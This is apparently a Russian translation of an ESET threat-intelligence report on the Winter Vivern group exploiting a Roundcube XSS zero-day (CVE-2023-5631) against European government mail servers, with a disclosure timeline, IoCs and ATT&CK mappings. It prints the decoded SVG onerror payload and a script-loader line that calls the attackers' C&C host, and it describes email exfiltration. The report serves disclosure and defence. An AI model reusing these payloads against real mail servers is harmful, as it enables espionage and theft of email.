ESET Research больше года внимательно следит за кибершпионской деятельностью Winter Vivern и во время нашего обычного мониторинга обнаружили, что 11 октября 2023 года группа начала использовать XSS-уязвимость нулевого дня в сервере Roundcube Webmail. Это другая уязвимость, чем CVE-2020-35730, которая, по нашим данным, также использовалась группой.

Согласно данным телеметрии ESET, кампания была нацелена на серверы Roundcube Webmail, принадлежащие правительственным организациям и аналитическому центру в Европе.

Хронология раскрытия уязвимости:
  • 12.10.2023: ESET Research сообщила об уязвимости команде Roundcube.
  • 14.10.2023: Команда Roundcube отреагировала и подтвердила уязвимость.
  • 14.10.2023: Команда Roundcube исправила уязвимость.
  • 16.10.2023: Команда Roundcube выпустила обновления безопасности для устранения уязвимости (1.6.4, 1.5.5 и 1.4.15).
  • 18.10.2023: ESET CNA присвоила CVE уязвимости (CVE-2023-5631).
  • 25.10.2023: Опубликован блог ESET Research.

Мы хотели бы поблагодарить разработчиков Roundcube за их быстрый ответ и за исправление уязвимости в такие короткие сроки.

Профиль Winter Vivern

Winter Vivern — это группа кибершпионов, впервые обнаруженная DomainTools в 2021 году. Считается, что она активна как минимум с 2020 года и нацелена на правительства в Европе и Центральной Азии. Для компрометации своих целей группа использует вредоносные документы, фишинговые веб-сайты и собственный PowerShell backdoor (см. статьи Государственного центра защиты от киберугроз Украины и SentinelLabs). Мы с низкой степенью уверенности полагаем, что Winter Vivern связана с MoustachedBouncer, изощренной группой, связанной с Беларусью, о которой мы впервые сообщили в августе 2023 года.

Winter Vivern с 2022 года нацелена на почтовые серверы Zimbra и Roundcube, принадлежащие правительственным организациям — см. статью Proofpoint. В частности, мы заметили, что группа использовала CVE-2020-35730, другую XSS-уязвимость в Roundcube, в августе и сентябре 2023 года. Обратите внимание, что Sednit (также известный как APT28) также использует эту старую XSS-уязвимость в Roundcube, иногда против тех же целей.

Технические детали

Эксплуатация XSS-уязвимости, которой присвоен CVE-2023-5631, может быть выполнена удаленно путем отправки специально созданного электронного письма. В этой кампании Winter Vivern письма отправлялись с team.managment@outlook[.]com и имели тему Get started in your Outlook, как показано на Рисунке 1.

Figure-1-wintervivern-email
Рисунок 1. Вредоносное электронное письмо

На первый взгляд, письмо не выглядит вредоносным — но если мы изучим исходный код HTML, показанный на Рисунке 2, то увидим в конце тег SVG, который содержит пейлоад, закодированный в base64.

Figure-2-winter-vivern-email-message
Рисунок 2. Электронное письмо с вредоносным тегом SVG

После декодирования значения, закодированного в base64, в атрибуте href тега use мы получаем:

<svg id=»x» xmlns=»http://www.w3.org/2000/svg»> <image href=»x» onerror=»eval(atob(‘<base64-encoded payload>’))» /></svg>

Поскольку аргумент x в атрибуте href не является допустимым URL, сработает атрибут onerror этого объекта. Декодирование пейлоада в атрибуте onerror дает нам следующий JavaScript-код (с вручную замененным вредоносным URL), который будет выполнен в браузере жертвы в контексте ее сеанса Roundcube:

var fe=document.createElement(‘script’);fe.src=»https://recsecas[.]com/controlserver/checkupdate.js»;document.body.appendChild(fe);

Удивительно, но мы заметили, что инъекция JavaScript сработала на полностью обновленном экземпляре Roundcube. Оказалось, что это XSS-уязвимость нулевого дня, затрагивающая серверный скрипт rcube_washtml.php, который не должным образом очищает вредоносный SVG-документ перед добавлением на HTML-страницу, интерпретируемую пользователем Roundcube. Мы сообщили об этом Roundcube, и 14 октября 2023 года уязвимость была исправлена (см. этот коммит). Уязвимость затрагивает версии Roundcube 1.6.x до 1.6.4, 1.5.x до 1.5.5 и 1.4.x до 1.4.15.

Таким образом, отправляя специально созданное электронное письмо, злоумышленники могут загрузить произвольный JavaScript-код в контексте окна браузера пользователя Roundcube. Никакого ручного взаимодействия, кроме просмотра сообщения в веб-браузере, не требуется.

Второй этап — это простой загрузчик JavaScript под названием checkupdate.js, показанный на Рисунке 3.

Figure-3-javascript-loader
Рисунок 3. Загрузчик JavaScript

Финальный JavaScript-пейлоад — показанный на Рисунке 4 — способен перечислять папки и электронные письма в текущей учетной записи Roundcube и передавать электронные письма на C&C-сервер, отправляя HTTP-запросы на https://recsecas[.]com/controlserver/saveMessage.

Figure-4-final-payload
Рисунок 4. Финальный JavaScript-пейлоад, передающий электронные письма из учетной записи Roundcube (часть обфусцированного скрипта удалена для ясности)

Вывод

Winter Vivern активизировала свои операции, используя уязвимость нулевого дня в Roundcube. Ранее они использовали известные уязвимости в Roundcube и Zimbra, для которых существуют общедоступные proof-of-concept.

Несмотря на низкую изощренность набора инструментов группы, она представляет угрозу для правительств в Европе из-за своей настойчивости, очень регулярного проведения фишинговых кампаний и того факта, что значительное количество интернет-приложений не обновляется регулярно, хотя известно, что они содержат уязвимости.

По всем вопросам, касающимся наших исследований, опубликованных на WeLiveSecurity, пожалуйста, свяжитесь с нами по адресу threatintel@eset.com.
ESET Research предлагает частные отчеты об APT-разведке и потоки данных. По всем вопросам, касающимся этой услуги, посетите страницу ESET Threat Intelligence.

IoCs

Файлы

SHA-1

Имя файла

Обнаружение

Описание

97ED594EF2B5755F0549C6C5758377C0B87CFAE0

checkupdate.js

JS/WinterVivern.B

Загрузчик JavaScript.

8BF7FCC70F6CE032217D9210EF30314DDD6B8135

N/A

JS/Kryptik.BIK

JavaScript-пейлоад, передающий электронные письма в Roundcube.

Сеть

IP

Домен

Хостинг-провайдер

Впервые замечено

Детали

38.180.76[.]31

recsecas[.]com

M247 Europe SRL

2023-09-28

Сервер C&C Winter Vivern

Адреса электронной почты

team.managment@outlook[.]com

MITRE ATT&CK техники

Эта таблица составлена с использованием версии 13 фреймворка MITRE ATT&CK.

Тактика

ID

Название

Описание

Развитие ресурсов

T1583.001

Приобретение инфраструктуры: Домены

Операторы Winter Vivern купили домен у Registrar.eu.

T1583.004

Приобретение инфраструктуры: Сервер

Операторы Winter Vivern арендовали сервер у M247.

T1587.004

Разработка возможностей: Эксплойты

Операторы Winter Vivern, вероятно, разработали эксплойт для Roundcube.

Первоначальный доступ

T1190

Эксплуатация общедоступного приложения

Winter Vivern отправила электронное письмо с использованием CVE‑2023-5631 в Roundcube.

T1566

Фишинг

Уязвимость срабатывает через фишинговое электронное письмо, которое должно быть открыто жертвой в Roundcube webmail.

Выполнение

T1203

Эксплуатация для выполнения на стороне клиента

JavaScript-пейлоад выполняется XSS-уязвимостью в Roundcube.

Обнаружение

T1087.003

Обнаружение учетной записи: Учетная запись электронной почты

JavaScript-пейлоад может перечислять папки в учетной записи электронной почты.

Сбор данных

T1114.002

Сбор электронной почты: Удаленный сбор электронной почты

JavaScript-пейлоад может передавать электронные письма из учетной записи Roundcube.

Командный центр

T1071.001

Протокол прикладного уровня: Веб-протоколы

Коммуникации C&C используют HTTPs.

Эксфильтрация

T1041

Эксфильтрация через канал C2

Эксфильтрация осуществляется через HTTPs и на тот же C&C-сервер.

Читать полный анализ на WeLiveSecurity →